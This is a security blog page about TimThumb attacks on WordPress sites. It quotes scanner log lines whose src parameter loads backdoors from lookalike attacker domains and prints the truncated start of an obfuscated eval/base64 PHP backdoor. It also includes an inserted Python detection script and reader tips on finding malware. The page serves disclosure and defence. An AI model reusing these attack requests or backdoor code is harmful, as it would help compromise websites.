
Sucuri Blog

Website Security News


List of Domains Hosting Webshells for Timthumb Attacks

May 31, 2012 | Daniel Cid


We have been tracking TimThumb-related attacks for a while and they are still at full force (yes, some people are still using the outdated versions and getting compromised).

In the month of May alone, we identified more than 400 domains hosting backdoors for this type of attack, and a botnet with more than 1,000 IP addresses scanning for sites that might be vulnerable to it.

If you look at your logs, this is what the scans look like:

216.227.214.242 - - [31/May/2012:03:55:35 +0000] "GET /wp-content/themes/vibrantcms/thumb.php?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1" 404 9347 "-" ""

or

112.78.3.167 - - [31/May/2012:03:45:50 +0000] "GET //wp-content/themes/Quadro/timthumb.php?src=http://img.youtube.com.spectra-entertainment.com/upload.php HTTP/1.1" 404 305 "-" ""

The scanners are basically searching each site for hundreds of themes that could still have the old timthumb.php enabled, and attempting to insert the backdoors hosted at http://img.youtube.com.spectra-entertainment.com/upload.php and http://blogger.com.nilgirisrealty.com/cok.php on the site.
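Detection logic for the scan pattern in the two log lines above, as an added example that is not from the original post: it parses combined-format access logs, picks out requests to thumb.php/timthumb.php whose src parameter is a remote URL, and flags source hosts that merely embed a well-known image host name inside another domain. The TRUSTED_HOSTS list and the last three sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: image hosts worth treating as legitimate src targets. The first
# two appear (imitated) in the post's log lines; adjust to your own allow-list.
TRUSTED_HOSTS = ("blogger.com", "img.youtube.com", "flickr.com",
                 "picasa.com", "wordpress.com")

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')
# Script names probed in the post's log lines.
SCRIPT_RE = re.compile(r'/(?:tim)?thumb\.php$', re.IGNORECASE)

# First two lines are from the post (typographic quotes and dashes normalised
# to ASCII); the last three are constructed.
SAMPLE_LOG = '''\
216.227.214.242 - - [31/May/2012:03:55:35 +0000] "GET /wp-content/themes/vibrantcms/thumb.php?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1" 404 9347 "-" ""
112.78.3.167 - - [31/May/2012:03:45:50 +0000] "GET //wp-content/themes/Quadro/timthumb.php?src=http://img.youtube.com.spectra-entertainment.com/upload.php HTTP/1.1" 404 305 "-" ""
192.0.2.10 - - [31/May/2012:04:00:01 +0000] "GET /wp-content/themes/demo/timthumb.php?src=/wp-content/uploads/a.jpg&w=100 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.11 - - [31/May/2012:04:00:02 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.0.2.12 - - [31/May/2012:04:00:03 +0000] "GET /wp-content/themes/demo/timthumb.php?src=http://img.youtube.com/vi/abc/0.jpg HTTP/1.1" 200 7000 "-" "Mozilla/5.0"
'''


def is_trusted(host):
    """Exact match or a real subdomain of a trusted host."""
    return any(host == t or host.endswith("." + t) for t in TRUSTED_HOSTS)


def classify_line(line):
    """Return a finding dict for remote-src thumbnail requests, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Split by hand: a target starting with "//" would confuse urlsplit.
    path, _, query = m["target"].partition("?")
    if not SCRIPT_RE.search(path):
        return None
    src = parse_qs(query).get("src", [""])[0]
    try:
        host = (urlsplit(src).hostname or "").lower()
    except ValueError:          # malformed URL in src
        host = ""
    if not host:
        return None             # local path or unparsable: no remote host
    if is_trusted(host):
        verdict = "remote-trusted"
    elif any(t in host for t in TRUSTED_HOSTS):
        # Trusted name embedded in someone else's domain.
        verdict = "lookalike-host"
    else:
        verdict = "remote-untrusted"
    return {"ip": m["ip"], "status": int(m["status"]),
            "script": path, "src_host": host, "verdict": verdict}


def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify_line, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.splitlines()):
        print(finding)
```

A "lookalike-host" hit answered with 200 rather than 404 is the case to investigate first, since the probed script exists on that site.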

The full list of domains hosting the backdoor is on our labs post:

List of domains hosting webshells for Timthumb attacks

and the list of IP addresses is there too:

List of IP addresses scanning for vulnerable timthumb.


Categories: Vulnerability Disclosure, Website Malware Infections, WordPress Security
Tags: Malware Updates

About Daniel Cid

Daniel B. Cid is Founder of Sucuri and the VP of Engineering for the GoDaddy Security Products group. He is also the founder of OSSEC and CleanBrowsing. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid


Comments

  1. Guest

    May 31, 2012

    Okay, one of my server’s IPs is listed and it belongs to a shared hosting server. I can find numerous logs with hits from other IPs and its own….

    This might be a stupid question… but how do I track down the webshell script that is scanning? 

    • Peter Abraham

      May 31, 2012

      http://www.rfxn.com/projects/linux-malware-detect/ does a reasonable job.  If you are comfortable with Clam Anti-Virus, turn on the ability to detect possible unwanted applications (PUA) and scan with Clam Anti-Virus.

      Spot checking directories that malware likes to hide in such as /tmp, /var/tmp, /dev/shm and the like can often end up finding the malware.

      In terms of end user sites, pay careful attention to any directory with 777 permissions or any files with >= 666 permissions or files and folders owned by the web server (i.e. httpd / apache / nobody).

      And… you can always hire Sucuri to help you.

  2. Peter Abraham

    May 31, 2012

    Great work!  I wrote http://www.dynamicnet.net/2012/05/linux-techniques-sucuri-labs/ with the hope to encourage security and system admins to benefit from your work.

List of domains hosting webshells for Timthumb attacks

May 28, 2012 | Daniel Cid


We have been tracking timthumb.php-related attacks for a little while, and they are still at full force. Just for the month of May, these are the domains we identified hosting backdoors that were used by the attackers (420 different URLs).


And most of them are still live. If you download them you will see many backdoor variations:

if (isset($lol)) { eval ( gzinflate(base64_decode("pZJda8IwFIbvB/sPMQhNQMR9XM05Cvsbg1DTE5vRJiEnnRbxvy9Jre5C8GJ35f143kMoyMYS+rNyn/5l/771H3T9+ABZxAHf6NI1TvSm6oDxJZ0Cc9nVG5pjxm5X9ZDa2QCEXa+TDQeWYnziXa2oqN7IoK0hOaWAH2PXA5INKYroa0XYDDoXhtFOvlZsqgk4aAzICjiALLJbps8cXiRQmj0Dv602jH4ZejFO8aQW4RYQG2hbccWeGeVVHw+6QxkwQHc+zG4FhsoHlkrlaF0gEz+GdhCEtCaAiYicjSKYWsgWKsPuTLoKMTS+vzk6mf+eLTWKWLW9l8DmKiGcdWDGh6ee8r+vRtMvsW90C2xWKrAqVjgnR5L9ZSwrD1Ud1cXT6vmVr8kpHStbi4mep6PiIfTe..

And we will keep monitoring them.


Categories: Uncategorized
